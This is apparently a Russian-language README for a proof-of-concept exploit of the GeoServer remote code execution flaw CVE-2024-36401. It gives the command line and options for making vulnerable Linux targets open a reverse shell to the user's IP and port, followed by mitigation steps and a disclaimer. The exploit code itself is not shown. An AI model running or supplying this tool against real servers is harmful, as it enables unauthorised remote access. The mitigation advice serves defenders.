
POC для CVE-2024-36401. Этот POC попытается установить обратный шелл с уязвимых целей.
POC для CVE-2024-36401 GeoServer. Этот POC попытается установить обратную системную оболочку с целевых систем.

POC для CVE-2024-36401: RCE для GeoServer версий до 2.25.1, 2.24.3 и 2.23.5. Этот POC основан на информационном бюллетене безопасности от phith0n.
Этот POC попытается установить обратную оболочку с уязвимых целей. Он предназначен для работы с уязвимыми целями на Linux. Для запуска этого POC вам понадобится машина с опубликованным и доступным IP-адресом.
requestsЧтобы использовать этот POC против одной цели:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Справка:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- Отключите WFS-запросы.
2- Защитите вашу Linux-систему, настроив iptables для блокировки обратных соединений, установив политики по умолчанию на отклонение всего трафика, разрешив установленные и связанные соединения, и разрешив только необходимый исходящий трафик, такой как DNS, HTTP и HTTPS.
3- Или обновитесь до последней версии GeoServer.
По любым предложениям или замечаниям, пожалуйста, свяжитесь со мной.
Мне нравится создавать собственные инструменты для развлечения, работы и только в образовательных целях. Я не поддерживаю и не поощряю взлом или несанкционированный доступ к любым системам или сетям. Пожалуйста, используйте мои инструменты ответственно и только на тех системах, где у вас есть явное разрешение на тестирование.